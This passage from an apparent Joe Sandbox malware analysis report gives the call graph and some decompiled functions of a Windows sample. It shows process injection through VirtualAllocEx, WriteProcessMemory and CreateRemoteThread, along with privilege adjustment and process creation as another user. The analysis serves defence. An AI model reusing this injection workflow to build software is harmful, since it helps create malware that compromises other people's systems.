4168e8 VirtualProtect 10343->10827 10348 4045b6 10353 4045d1 VirtualFree 10348->10353 10350 40460e 10350->10339 10838 411cdd 10350->10838 10351 404471 ExitWindowsEx 10352 40447e 10351->10352 10354 403cc5 StringFromGUID2 10352->10354 10353->10350 10355 40448f OpenEventW 10354->10355 10357 4044b3 10355->10357 10358 4044a9 SetEvent CloseHandle 10355->10358 10775 4040db 10357->10775 10358->10357 10362 403cc5 StringFromGUID2 10363 404650 CreateEventW 10362->10363 10364 404675 WaitForSingleObject 10363->10364 10365 40467e WaitForMultipleObjects 10363->10365 10366 40468c 10364->10366 10365->10366 10367 404692 CloseHandle 10366->10367 10368 40469c CloseHandle CloseHandle 10366->10368 10367->10368 10368->10339 10443 414c0d GetPEB 10369->10443 10372 4035ef GetModuleHandleW 10373 403628 GetModuleHandleW 10372->10373 10374 4035dd 10372->10374 10373->10374 10375 403638 6 API calls 10373->10375 10374->10266 10374->10267 10376 4036ad 10375->10376 10376->10374 10377 403603 10377->10373 10377->10374 10379 4036f8 10378->10379 10380 4036e8 10378->10380 10445 413873 InitializeSecurityDescriptor 10379->10445 10460 411c1d GetModuleHandleW 10380->10460 10383 403714 10383->10272 10385 403726 10463 40f3b4 GetVersionExW 10385->10463 10393 403770 CreateEventW 10392->10393 10394 40378f 10392->10394 10393->10394 10395 40378b 10393->10395 10394->10395 10396 403796 CreateEventW 10394->10396 10395->10266 10395->10275 10396->10395 10398 403b10 10397->10398 10399 411a46 10397->10399 10398->10266 10398->10278 10484 413971 GetTokenInformation 10399->10484 10402 411a7a CloseHandle 10402->10398 10403 411a5a GetTokenInformation 10403->10402 10404 411a72 10403->10404 10405 410418 HeapFree 10404->10405 10406 411a78 10405->10406 10406->10402 10408 4037e0 GetModuleFileNameW 10407->10408 10409 4037bd SHGetFolderPathW 10407->10409 10494 4107dc 10408->10494 10410 4037d5 10409->10410 10411 4037d9 PathRemoveBackslashW 10409->10411 10410->10266 10410->10282 10411->10408 10414 403824 10413->10414 10415 403847 10413->10415 10414->10415 10416 40382c IsBadReadPtr 10414->10416 10415->10284 10416->10415 10418 403873 10417->10418 10419 40389f 10417->10419 10499 4149f0 10418->10499 10419->10266 10421 4038a7 10419->10421 10422 403919 10421->10422 10424 4038b8 10421->10424 10422->10266 10422->10290 10427 403947 InitializeCriticalSection InitializeCriticalSection 10422->10427 10423 4038c5 SHGetFolderPathW 10423->10424 10424->10422 10424->10423 10426 4038f9 lstrcmpiW 10424->10426 10502 415d45 10424->10502 10426->10422 10426->10424 10505 403ed1 10427->10505 10430 4039c2 ReadFile 10432 4039e2 CloseHandle 10430->10432 10433 4039dc 10430->10433 10431 4039e9 10513 40beff InitializeCriticalSection 10431->10513 10432->10431 10433->10432 10438 403a42 10557 4063f7 10438->10557 10439 403a3b 10552 4064da GetProcAddress GetProcAddress GetProcAddress GetProcAddress ResetEvent 10439->10552 10444 4035cf 10443->10444 10444->10372 10444->10374 10444->10377 10446 413887 SetSecurityDescriptorDacl 10445->10446 10448 403709 10445->10448 10447 413898 ConvertStringSecurityDescriptorToSecurityDescriptorW 10446->10447 10446->10448 10447->10448 10449 4138ad GetSecurityDescriptorSacl 10447->10449 10448->10383 10448->10385 10452 41493f SHGetFolderPathW 10448->10452 10450 4138c9 SetSecurityDescriptorSacl 10449->10450 10451 4138dd LocalFree 10449->10451 10450->10448 10450->10451 10451->10448 10453 414967 PathAddBackslashW 10452->10453 10459 4149d6 10452->10459 10454 4149a5 GetVolumeNameForVolumeMountPointW 10453->10454 10455 4149b8 10454->10455 10456 41497e PathRemoveBackslashW PathRemoveFileSpecW 10454->10456 10457 4149bf CLSIDFromString 10455->10457 10455->10459 10458 41499c PathAddBackslashW 10456->10458 10456->10459 10457->10459 10458->10454 10459->10385 10461 411c34 GetProcAddress 10460->10461 10462 4036ed 10460->10462 10461->10462 10462->10379 10464 40372b 10463->10464 10464->10383 10465 411b66 OpenProcessToken 10464->10465 10466 411b84 GetTokenInformation 10465->10466 10467 40373a 10465->10467 10468 411b9c GetLastError 10466->10468 10469 411c0e CloseHandle 10466->10469 10467->10272 10467->10383 10468->10469 10470 411ba7 10468->10470 10469->10467 10470->10469 10480 4103ed HeapAlloc 10470->10480 10472 411bb4 10473 411bba GetTokenInformation 10472->10473 10474 411c0d 10472->10474 10475 411bf0 10473->10475 10476 411bcd GetSidSubAuthorityCount 10473->10476 10474->10469 10481 410418 10475->10481 10476->10475 10477 411bd9 10476->10477 10477->10475 10479 411bdf GetSidSubAuthority 10477->10479 10479->10475 10480->10472 10482 410431 10481->10482 10483 41041f HeapFree 10481->10483 10482->10474 10483->10482 10485 413990 GetLastError 10484->10485 10486 411a4e 10484->10486 10485->10486 10487 41399b 10485->10487 10486->10402 10486->10403 10487->10486 10493 4103ed HeapAlloc 10487->10493 10489 4139a7 10489->10486 10490 4139ad GetTokenInformation 10489->10490 10490->10486 10491 4139c4 10490->10491 10492 410418 HeapFree 10491->10492 10492->10486 10493->10489 10495 4107e3 10494->10495 10496 4107e7 10494->10496 10495->10410 10496->10495 10498 4103ed HeapAlloc 10496->10498 10498->10495 10501 414a0b 10499->10501 10500 414a8a StringFromGUID2 10500->10419 10501->10500 10503 415d49 10502->10503 10504 415d5c PathCombineW 10502->10504 10503->10504 10504->10424 10506 403eed 10505->10506 10507 40399b CreateFileW 10506->10507 10561 410628 10506->10561 10507->10430 10507->10431 10510 415d45 PathCombineW 10511 403f3a 10510->10511 10511->10507 10512 403f44 PathRenameExtensionW 10511->10512 10512->10507 10514 40bf34 10513->10514 10528 403a0e 10513->10528 10517 40bf6e 10514->10517 10565 4144d2 RegCreateKeyExW 10514->10565 10519 40bfce 10517->10519 10570 41442c RegOpenKeyExW 10517->10570 10574 41447f 10517->10574 10520 40bfe4 RegOpenKeyExW 10519->10520 10521 40c009 10520->10521 10522 40bffe 10520->10522 10524 40c020 10521->10524 10525 41442c 3 API calls 10521->10525 10577 4145c8 RegQueryValueExW RegCloseKey 10522->10577 10526 41447f 3 API calls 10524->10526 10530 40c031 10524->10530 10525->10524 10526->10530 10532 40a6b4 10528->10532 10529 41442c 3 API calls 10529->10530 10530->10528 10530->10529 10531 41447f 3 API calls 10530->10531 10578 4111a5 10530->10578 10531->10530 10533 40a6cc GetModuleHandleW 10532->10533 10534 403a19 InitializeCriticalSection GetModuleHandleW 10532->10534 10533->10534 10535 40a6db 10533->10535 10534->10438 10534->10439 10536 40a748 10535->10536 10537 40a6e5 10535->10537 10538 40a447 13 API calls 10536->10538 10586 4113c1 10537->10586 10538->10534 10542 40a6ff 10543 410418 HeapFree 10542->10543 10544 40a707 10543->10544 10544->10534 10594 411233 10544->10594 10548 40a732 10548->10534 10600 40a447 10548->10600 10551 410418 HeapFree 10551->10534 10666 406290 10552->10666 10555 406556 SetEvent 10555->10438 10558 406400 10557->10558 10559 406290 13 API calls 10558->10559 10560 403a56 10559->10560 10560->10290 10562 410632 MultiByteToWideChar 10561->10562 10563 41062d 10561->10563 10564 403f2d 10562->10564 10563->10562 10564->10507 10564->10510 10566 4144fa RegSetValueExW 10565->10566 10567 41451f 10565->10567 10568 414514 10566->10568 10569 414516 RegCloseKey 10566->10569 10567->10517 10568->10569 10569->10567 10571 41444e 10570->10571 10573 414464 10570->10573 10583 41449e RegQueryValueExW 10571->10583 10573->10517 10575 4144d2 3 API calls 10574->10575 10576 41449a 10575->10576 10576->10517 10577->10521 10579 4111b3 10578->10579 10580 4111ae 10578->10580 10581 4111be wvnsprintfW 10579->10581 10580->10530 10582 4111d9 10581->10582 10582->10530 10584 4144c0 10583->10584 10585 4144c3 RegCloseKey 10583->10585 10584->10585 10585->10573 10587 4113cb 10586->10587 10616 410400 10587->10616 10589 40a6ec 10589->10534 10590 4112c2 10589->10590 10591 4112ca 10590->10591 10593 4112e2 10591->10593 10619 4105cf 10591->10619 10593->10542 10632 41127c 10594->10632 10597 4112b2 10598 410418 HeapFree 10597->10598 10599 4112b9 10598->10599 10599->10548 10649 40f369 10600->10649 10603 40a5c6 10603->10551 10604 40a47c 10605 415d45 PathCombineW 10604->10605 10606 40a48b 10605->10606 10606->10603 10607 415d45 PathCombineW 10606->10607 10608 40a4b3 10607->10608 10608->10603 10609 40a4bb GetFileAttributesW 10608->10609 10609->10603 10614 40a4d1 10609->10614 10610 4111a5 wvnsprintfW 10610->10614 10611 40a515 GetPrivateProfileIntW 10611->10603 10612 40a536 GetPrivateProfileStringW 10611->10612 10612->10614 10613 415d45 PathCombineW 10613->10614 10614->10603 10614->10610 10614->10611 10614->10613 10651 40a5cd 10614->10651 10617 410405 HeapAlloc 10616->10617 10618 410404 10616->10618 10617->10589 10618->10589 10621 4105dc 10619->10621 10627 410599 10621->10627 10623 41061b 10623->10593 10625 410607 10625->10623 10626 410599 WideCharToMultiByte 10625->10626 10626->10623 10628 4105a3 WideCharToMultiByte 10627->10628 10629 41059e 10627->10629 10630 4105c0 10628->10630 10629->10628 10630->10623 10631 4103ed HeapAlloc 10630->10631 10631->10625 10637 41072c 10632->10637 10635 410418 HeapFree 10636 40a725 10635->10636 10636->10597 10638 41073a 10637->10638 10639 410775 10638->10639 10641 41075c wvnsprintfA 10638->10641 10642 4103a8 10638->10642 10639->10635 10639->10636 10641->10638 10643 4103b8 10642->10643 10644 4103ac 10642->10644 10646 4103d2 HeapReAlloc 10643->10646 10647 4103c2 HeapAlloc 10643->10647 10645 410418 HeapFree 10644->10645 10648 4103b3 10645->10648 10646->10648 10647->10648 10648->10638 10650 40a460 SHGetFolderPathW 10649->10650 10650->10603 10650->10604 10652 40a5e8 10651->10652 10653 415d45 PathCombineW 10652->10653 10654 40a5f7 10653->10654 10655 40a6ae 10654->10655 10656 40a5ff CreateFileW 10654->10656 10655->10614 10656->10655 10657 40a62a 10656->10657 10658 40a63b WriteFile 10657->10658 10659 40a68b FlushFileBuffers CloseHandle 10658->10659 10663 40a65c 10658->10663 10659->10655 10660 40a6a2 10659->10660 10665 4158d7 SetFileAttributesW DeleteFileW 10660->10665 10662 40a680 10662->10659 10663->10659 10663->10662 10664 40a66d WriteFile 10663->10664 10664->10662 10665->10655 10667 4062a1 10666->10667 10668 4062be VirtualAllocEx 10666->10668 10667->10668 10670 406364 10667->10670 10669 4062df 10668->10669 10668->10670 10671 4062f1 10669->10671 10672 4062e5 ResetEvent 10669->10672 10670->10555 10681 40a754 InitializeCriticalSection GetProcAddress GetProcAddress GetProcAddress 10670->10681 10673 406320 10671->10673 10682 414d4a 10671->10682 10672->10671 10674 4063d2 10673->10674 10680 406329 10673->10680 10694 4061f8 10674->10694 10677 4063c2 SetEvent 10677->10670 10679 4063e2 SetEvent 10679->10670 10680->10670 10680->10677 10681->10555 10701 414d05 VirtualQueryEx 10682->10701 10685 414e56 10685->10671 10686 414d6a VirtualProtectEx 10686->10685 10687 414d85 10686->10687 10688 414d92 ReadProcessMemory 10687->10688 10689 414e42 VirtualProtectEx 10688->10689 10691 414dac 10688->10691 10689->10685 10690 414df1 10690->10689 10691->10690 10692 414df3 WriteProcessMemory 10691->10692 10692->10690 10693 414e1e WriteProcessMemory 10692->10693 10693->10690 10695 406288 10694->10695 10697 40620a 10694->10697 10695->10670 10695->10679 10696 414d05 VirtualQueryEx 10696->10697 10697->10695 10697->10696 10698 406235 VirtualProtectEx 10697->10698 10700 406264 VirtualProtectEx 10697->10700 10698->10697 10699 40624a WriteProcessMemory 10698->10699 10699->10697 10699->10700 10700->10697 10702 414d24 10701->10702 10702->10685 10702->10686 10706 411246 10703->10706 10711 4106b9 10706->10711 10709 40423a 10709->10297 10709->10301 10710 410418 HeapFree 10710->10709 10713 4106cb 10711->10713 10712 410718 10712->10709 10712->10710 10713->10712 10714 4103a8 3 API calls 10713->10714 10715 410700 wvnsprintfW 10713->10715 10714->10713 10715->10713 10717 415783 GetFileSizeEx 10716->10717 10720 4043b8 10716->10720 10718 415792 10717->10718 10719 4157e8 CloseHandle 10717->10719 10718->10719 10718->10720 10721 4157a7 VirtualAlloc 10718->10721 10719->10720 10720->10305 10725 40401e 10720->10725 10721->10719 10722 4157bc ReadFile 10721->10722 10723 4157d2 10722->10723 10724 4157da VirtualFree 10722->10724 10723->10720 10723->10724 10724->10719 10727 40403f 10725->10727 10726 40407b 10729 4157f8 10726->10729 10727->10726 10854 41046b 10727->10854 10730 415801 VirtualFree 10729->10730 10731 41580f 10729->10731 10730->10731 10732 415816 CloseHandle 10731->10732 10733 41581d 10731->10733 10732->10733 10733->10305 10736 405487 10734->10736 10735 4043fd 10735->10310 10741 403cc5 10735->10741 10736->10735 10737 410628 MultiByteToWideChar 10736->10737 10738 4054da 10737->10738 10738->10735 10739 4054ee StrCmpNIW 10738->10739 10739->10735 10740 4054fb lstrcmpiW 10739->10740 10740->10735 10742 403cd9 10741->10742 10743 4149f0 StringFromGUID2 10742->10743 10744 403cfa CreateMutexW 10743->10744 10744->10324 10744->10325 10746 413a77 10745->10746 10747 413a6e CloseHandle 10745->10747 10746->10324 10747->10746 10749 4060d3 10748->10749 10750 4060c9 10748->10750 10865 414526 RegOpenKeyExW 10749->10865 10857 403f5f 10750->10857 10753 410418 HeapFree 10754 40612c 10753->10754 10754->10341 10755 4060e9 10755->10753 10755->10754 10757 404d24 CreateToolhelp32Snapshot 10756->10757 10758 404d3b Process32FirstW 10757->10758 10759 404e6d 10757->10759 10767 404d59 10758->10767 10760 410418 HeapFree 10759->10760 10762 404468 10760->10762 10761 404e5f CloseHandle 10761->10757 10761->10759 10762->10351 10762->10352 10763 404e48 Process32NextW 10763->10767 10765 404d9d OpenProcess 10766 404e43 CloseHandle 10765->10766 10765->10767 10766->10763 10767->10761 10767->10763 10767->10765 10768 411a2c 8 API calls 10767->10768 10877 403c5d 10767->10877 10769 404dc3 CloseHandle 10768->10769 10773 404dcc 10769->10773 10770 404dd7 GetLengthSid 10770->10773 10771 410418 HeapFree 10771->10773 10772 4103a8 3 API calls 10772->10773 10773->10766 10773->10770 10773->10771 10773->10772 10884 404c7d OpenProcess 10773->10884 10783 4040f9 10775->10783 10776 40418b CloseHandle 10776->10310 10777 40412a 10778 40413f 10777->10778 10779 414332 2 API calls 10777->10779 10780 404159 10778->10780 10781 414332 2 API calls 10778->10781 10779->10778 10782 40417a 10780->10782 10785 414332 2 API calls 10780->10785 10784 404154 10781->10784 10782->10776 10935 414377 10782->10935 10783->10776 10783->10777 10923 414332 10783->10923 10928 40d550 HeapAlloc 10784->10928 10788 40416e 10785->10788 10790 414332 2 API calls 10788->10790 10790->10782 10794 403cc5 StringFromGUID2 10793->10794 10795 403d16 CreateMutexW 10794->10795 10796 403d2b 10795->10796 10798 403d32 10795->10798 10941 4139d2 WaitForSingleObject 10796->10941 10798->10318 10798->10320 10800 40f369 10799->10800 10801 405856 LoadLibraryW 10800->10801 10802 405869 10801->10802 10821 405900 10801->10821 10803 405876 GetProcAddress 10802->10803 10804 4058f4 FreeLibrary 10803->10804 10805 405884 10803->10805 10815 405907 10804->10815 10804->10821 10805->10804 10807 40589d SHGetFolderPathW 10805->10807 10806 405912 NetUserEnum 10806->10815 10807->10804 10808 4058b5 10807->10808 10813 4058c0 StrCmpNIW 10808->10813 10809 405a1f SHGetFolderPathW 10810 405a3a 10809->10810 10809->10821 10814 41484c 5 API calls 10810->10814 10811 405956 NetUserGetInfo 10811->10815 10812 405a0a NetApiBufferFree 10812->10815 10813->10804 10816 4058d8 10813->10816 10817 405a51 10814->10817 10815->10806 10815->10809 10815->10811 10815->10812 10820 4059f8 NetApiBufferFree 10815->10820 10822 415d45 PathCombineW 10815->10822 10945 40f504 ConvertSidToStringSidW 10815->10945 10954 415ac4 PathSkipRootW 10815->10954 10959 41484c 10815->10959 10966 404f83 10815->10966 10984 4050b0 10815->10984 10816->10804 10819 404f83 19 API calls 10817->10819 10817->10821 10819->10821 10820->10815 10821->10339 10822->10815 10828 416903 VirtualProtect 10827->10828 10829 416932 10827->10829 10828->10829 10829->10348 10832 405173 10831->10832 10833 40503f 17 API calls 10832->10833 10834 4051a2 FreeLibrary 10832->10834 10837 4051eb 10832->10837 10833->10832 10836 4051b3 10834->10836 10836->10350 10837->10350 10839 411ceb 10838->10839 10840 411cfe 10838->10840 10841 411220 4 API calls 10839->10841 10842 411220 4 API calls 10840->10842 10843 411cf9 10841->10843 10842->10843 10844 404632 10843->10844 11084 411c5d 10843->11084 10844->10339 10844->10362 10846 411d27 10847 410418 HeapFree 10846->10847 10847->10844 11090 4111e9 10849->11090 10851 414ad5 10852 414aea 10851->10852 11095 414af8 10851->11095 10852->10310 10855 410400 HeapAlloc 10854->10855 10856 410474 10855->10856 10856->10726 10858 403f78 10857->10858 10859 410628 MultiByteToWideChar 10858->10859 10861 403fc7 10858->10861 10860 403fa2 10859->10860 10860->10861 10862 415d45 PathCombineW 10860->10862 10861->10749 10863 403fb5 10862->10863 10863->10861 10864 410628 MultiByteToWideChar 10863->10864 10864->10861 10866 414593 10865->10866 10867 41454d RegQueryValueExW 10865->10867 10866->10755 10868 414589 RegCloseKey 10867->10868 10869 41456c 10867->10869 10868->10866 10870 414580 10869->10870 10875 414573 10869->10875 10876 4103ed HeapAlloc 10869->10876 10873 410418 HeapFree 10870->10873 10872 4145a0 10872->10870 10874 4145a6 RegQueryValueExW 10872->10874 10873->10875 10874->10870 10874->10875 10875->10868 10876->10872 10878 403c75 10877->10878 10879 4149f0 StringFromGUID2 10878->10879 10880 403ca1 CreateMutexW 10879->10880 10881 403cb6 10880->10881 10882 403cbb 10880->10882 10883 413a5e 2 API calls 10881->10883 10882->10767 10883->10882 10885 404cfd 10884->10885 10886 404c9d 10884->10886 10885->10773 10893 403d3b 10886->10893 10889 404cf5 CloseHandle 10889->10885 10890 404cad CreateRemoteThread 10891 404ce7 VirtualFreeEx 10890->10891 10892 404ccc WaitForSingleObject CloseHandle 10890->10892 10891->10889 10892->10889 10908 414e5f IsBadReadPtr 10893->10908 10896 403d55 10896->10889 10896->10890 10897 403d5c DuplicateHandle 10898 403d77 10897->10898 10899 403d7b WriteProcessMemory 10897->10899 10898->10899 10900 403dac 10899->10900 10901 403daf WriteProcessMemory 10899->10901 10900->10901 10902 403dcf 10901->10902 10919 403567 DuplicateHandle 10902->10919 10905 403567 3 API calls 10906 403e01 10905->10906 10906->10896 10907 403e0d VirtualFreeEx 10906->10907 10907->10896 10909 414e8c VirtualAllocEx 10908->10909 10910 403d4c 10908->10910 10909->10910 10911 414eaa 10909->10911 10910->10896 10910->10897 10912 41046b HeapAlloc 10911->10912 10918 414eb1 10912->10918 10913 414f43 VirtualFreeEx 10913->10910 10914 414f37 10915 410418 HeapFree 10914->10915 10916 414f3d 10915->10916 10916->10910 10916->10913 10917 414f20 WriteProcessMemory 10917->10914 10918->10913 10918->10914 10918->10917 10920 403593 WriteProcessMemory 10919->10920 10921 4035ad 10919->10921 10920->10921 10922 4035b1 DuplicateHandle 10920->10922 10921->10905 10922->10921 10924 414337 SetLastError 10923->10924 10925 414346 10923->10925 10927 414342 10924->10927 10926 41434d CreateThread 10925->10926 10925->10927 10926->10927 10927->10777 10929 40d5b2 10928->10929 10930 40d56f HeapAlloc 10928->10930 10929->10780 10930->10929 10931 40d580 10930->10931 10932 414332 2 API calls 10931->10932 10933 40d5a7 10932->10933 10934 414332 2 API calls 10933->10934 10934->10929 10936 404186 10935->10936 10937 41437d WaitForMultipleObjects 10935->10937 10938 41439a 10936->10938 10937->10936 10939 4143a1 CloseHandle 10938->10939 10940 4143b4 10938->10940 10939->10939 10939->10940 10940->10776 10942 4139f0 10941->10942 10943 4139df 10941->10943 10942->10798 10943->10942 10944 4139e6 CloseHandle 10943->10944 10944->10798 10946 40f525 10945->10946 10947 40f5a9 10945->10947 10948 4111a5 wvnsprintfW 10946->10948 10947->10815 10950 40f550 10948->10950 10949 40f59d LocalFree 10949->10947 10950->10949 11003 4143b6 RegOpenKeyExW 10950->11003 10953 40f57a PathUnquoteSpacesW ExpandEnvironmentStringsW 10953->10949 10955 415adb 10954->10955 10956 415af1 GetFileAttributesW 10955->10956 10958 415b22 10955->10958 10956->10955 10957 415b05 CreateDirectoryW 10956->10957 10957->10955 10958->10815 10962 414858 10959->10962 10961 415d45 PathCombineW 10961->10962 10962->10961 10963 414897 GetFileAttributesW 10962->10963 10964 414887 PathAddExtensionW 10962->10964 10965 4148ab 10962->10965 11007 41471a 10962->11007 10963->10962 10963->10965 10964->10962 10964->10963 10965->10815 10967 415750 6 API calls 10966->10967 10968 404f9d 10967->10968 10969 404fc1 10968->10969 10970 404fc3 10968->10970 10971 404fa7 10968->10971 10969->10815 10973 41046b HeapAlloc 10970->10973 11023 404f37 10971->11023 10975 404fcf 10973->10975 10977 4157f8 2 API calls 10975->10977 10976 4157f8 2 API calls 10976->10969 10978 404fd9 10977->10978 10978->10969 11029 404084 10978->11029 10981 404ff8 10982 410418 HeapFree 10981->10982 10982->10969 10983 404f37 7 API calls 10983->10981 10985 40f369 10984->10985 10986 4050c4 LoadLibraryW 10985->10986 10987 4051b3 10986->10987 10988 4050d8 10986->10988 10987->10820 10989 4050e7 GetProcAddress 10988->10989 11051 40f333 10989->11051 10992 40f333 10993 40511c GetProcAddress 10992->10993 10994 4051a8 FreeLibrary 10993->10994 10995 40512c 10993->10995 10994->10987 10995->10994 11053 411ade GetCurrentThread OpenThreadToken 10995->11053 10998 40514d 11061 40503f 10998->11061 11000 4051a2 11000->10994 11001 40515a 11001->10994 11001->11000 11002 40503f 17 API calls 11001->11002 11002->11001 11004 4143d3 11003->11004 11006 40f571 11003->11006 11005 41449e 2 API calls 11004->11005 11005->11006 11006->10949 11006->10953 11017 41185e 11007->11017 11018 41186c 11017->11018 11019 411867 11017->11019 11021 411812 GetTickCount 11018->11021 11020 411812 GetTickCount 11019->11020 11020->11018 11022 411820 11021->11022 11024 404f62 SetFileAttributesW 11023->11024 11033 4156eb CreateFileW 11024->11033 11027 404f51 Sleep 11027->11024 11028 404f77 11028->10976 11030 4040a2 11029->11030 11031 4040ca 11030->11031 11042 4167da 11030->11042 11031->10981 11031->10983 11034 415712 11033->11034 11035 404f46 11033->11035 11036 415732 11034->11036 11037 41571c WriteFile 11034->11037 11035->11027 11035->11028 11038 415734 CloseHandle 11036->11038 11037->11036 11037->11038 11038->11035 11039 415740 11038->11039 11041 4158d7 SetFileAttributesW DeleteFileW 11039->11041 11041->11035 11043 4167f4 11042->11043 11045 4167f0 11042->11045 11046 4119cd 11043->11046 11045->11031 11047 411a03 11046->11047 11048 4119d6 11046->11048 11047->11045 11048->11047 11049 4119e1 Sleep 11048->11049 11050 41185e GetTickCount 11048->11050 11049->11048 11050->11048 11052 405104 GetProcAddress 11051->11052 11052->10992 11054 411b15 LookupPrivilegeValueW 11053->11054 11055 411aff OpenProcessToken 11053->11055 11057 411b35 AdjustTokenPrivileges 11054->11057 11058 411b56 CloseHandle 11054->11058 11055->11054 11056 40513f WTSGetActiveConsoleSessionId 11055->11056 11056->10998 11056->11001 11057->11058 11059 411b4a GetLastError 11057->11059 11058->11056 11059->11058 11060 411b54 11059->11060 11060->11058 11062 40504c 11061->11062 11063 4050ac 11062->11063 11064 413971 5 API calls 11062->11064 11063->11001 11065 405059 11064->11065 11066 4050a2 CloseHandle 11065->11066 11067 40505f EqualSid 11065->11067 11066->11063 11068 40509b 11067->11068 11069 40506e 11067->11069 11071 410418 HeapFree 11068->11071 11070 411220 4 API calls 11069->11070 11072 405083 11070->11072 11071->11066 11072->11068 11076 411d38 LoadLibraryA 11072->11076 11075 410418 HeapFree 11075->11068 11077 411d5a GetProcAddress GetProcAddress 11076->11077 11078 405093 11076->11078 11079 411e11 FreeLibrary 11077->11079 11080 411d81 11077->11080 11078->11075 11079->11078 11080->11079 11081 411dc1 CreateProcessAsUserW 11080->11081 11082 411def CloseHandle CloseHandle 11081->11082 11083 411e06 11081->11083 11082->11083 11083->11079 11085 411c70 11084->11085 11086 411c8f CreateProcessW 11085->11086 11087 411cac 11086->11087 11089 411cb1 11086->11089 11088 411cc1 CloseHandle CloseHandle 11087->11088 11087->11089 11088->11089 11089->10846 11091 4111f1 11090->11091 11092 4111f5 11090->11092 11091->10851 11093 4111fc wvnsprintfA 11092->11093 11094 411214 11093->11094 11094->10851 11113 4158f8 GetTempPathW 11095->11113 11098 414b1a CharToOemW 11099 411233 4 API calls 11098->11099 11100 414b46 11099->11100 11101 414bfb 11100->11101 11103 4156eb 5 API calls 11100->11103 11120 4158d7 SetFileAttributesW DeleteFileW 11101->11120 11104 414b63 11103->11104 11105 410418 HeapFree 11104->11105 11106 414b6d 11105->11106 11106->11101 11107 4111a5 wvnsprintfW 11106->11107 11108 414b93 11107->11108 11108->11101 11109 414b9b GetEnvironmentVariableW 11108->11109 11109->11101 11110 414bba 11109->11110 11111 411cdd 7 API calls 11110->11111 11112 414bf3 11111->11112 11112->10852 11115 41591d 11113->11115 11119 414b12 11113->11119 11114 411812 GetTickCount 11114->11115 11115->11114 11116 4111a5 wvnsprintfW 11115->11116 11117 415d45 PathCombineW 11115->11117 11118 4156eb 5 API calls 11115->11118 11115->11119 11116->11115 11117->11115 11118->11115 11119->11098 11119->11112 11120->11112

            Executed Functions

            Function 00413873 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57COMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 79%
            			E00413873(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
				signed int _v8;
				struct _ACL* _v12;
				int _v16;
				int _v20;
				void** _t19;
				struct _SECURITY_DESCRIPTOR* _t28;
				intOrPtr* _t29;

				_t29 = __esi;
				_t28 = __edi;
				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
					return 0;
				} else {
					_push(0);
					_t19 =  &_v8;
					_push(_t19);
					_push(1);
					_push(L"S:(ML;;NRNWNX;;;LW)"); // executed
					L00416BAA(); // executed
					if(_t19 == 0) {
						L6:
						_v8 = _v8 | 0xffffffff;
						L7:
						if(_t29 != 0) {
							 *_t29 = 0xc;
							 *(_t29 + 4) = _t28;
							 *((intOrPtr*)(_t29 + 8)) = 0;
						}
						return _v8;
					}
					_v12 = 0;
					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
						LocalFree(_v8);
						goto L6;
					} else {
						goto L7;
					}
				}
			}










            0x00413873
            0x00413873
            0x00413885
            0x00000000
            0x00413898
            0x00413898
            0x00413899
            0x0041389c
            0x0041389d
            0x0041389f
            0x004138a4
            0x004138ab
            0x004138e6
            0x004138e6
            0x004138ea
            0x004138ec
            0x004138ee
            0x004138f4
            0x004138f7
            0x004138f7
            0x00000000
            0x004138fa
            0x004138bc
            0x004138c7
            0x004138e0
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004138c7

            APIs
            • InitializeSecurityDescriptor.ADVAPI32(0041A2D4,00000001,00000000,00000000,00403AF4,?,00000000), ref: 0041387D
            • SetSecurityDescriptorDacl.ADVAPI32(0041A2D4,00000001,00000000,00000000,?,00000000), ref: 0041388E
            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 004138A4
            • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,00000000), ref: 004138BF
            • SetSecurityDescriptorSacl.ADVAPI32(0041A2D4,?,?,?,?,00000000), ref: 004138D3
            • LocalFree.KERNEL32(00000000,?,00000000), ref: 004138E0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
            • String ID: S:(ML;;NRNWNX;;;LW)
            • API String ID: 2050860296-820036962
            • Opcode ID: 751d40e5a0314824f90da1a7367051ddf1549b2fea14c0309d1912608cb11b4c
            • Instruction ID: 0f3395e7b72d2451ab94a713eddd680364df6529fd175c43f6694c2d08b2c48c
            • Opcode Fuzzy Hash: 751d40e5a0314824f90da1a7367051ddf1549b2fea14c0309d1912608cb11b4c
            • Instruction Fuzzy Hash: FE115E71A00209BBEB11AFA48D85EEFBBFCAF04741F10406AF551F11A0D7759A809B28
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403A5D Relevance: 9.1, APIs: 6, Instructions: 103memorynetworkCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 92%
            			E00403A5D(void* __ecx, void* __edx, void* __edi, signed char _a4) {
				char _v404;
				void* __esi;
				void* _t15;
				signed int _t18;
				signed int _t19;
				signed int _t20;
				void** _t21;
				void** _t23;
				signed int _t25;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t31;
				long _t34;
				void* _t36;
				void* _t37;
				void* _t38;
				signed int _t41;

				_t38 = __edi;
				_t37 = __edx;
				_t36 = __ecx;
				_t41 = _a4 & 0x00000001;
				_t34 = 0;
				if(_t41 == 0) {
					 *0x41a290 = _t34;
				}
				if(E004035C8(_t37, _a4) != 0) {
					_t15 = HeapCreate(_t34, 0x80000, _t34); // executed
					 *0x41bc68 = _t15;
					__eflags = _t15 - _t34;
					if(_t15 != _t34) {
						 *0x41a803 = 1;
					} else {
						 *0x41bc68 = GetProcessHeap();
						 *0x41a803 = _t34;
					}
					 *0x41ae9c = _t34;
					 *0x41a802 = _t34;
					InitializeCriticalSection(0x41a760);
					 *0x41a28c = _t34; // executed
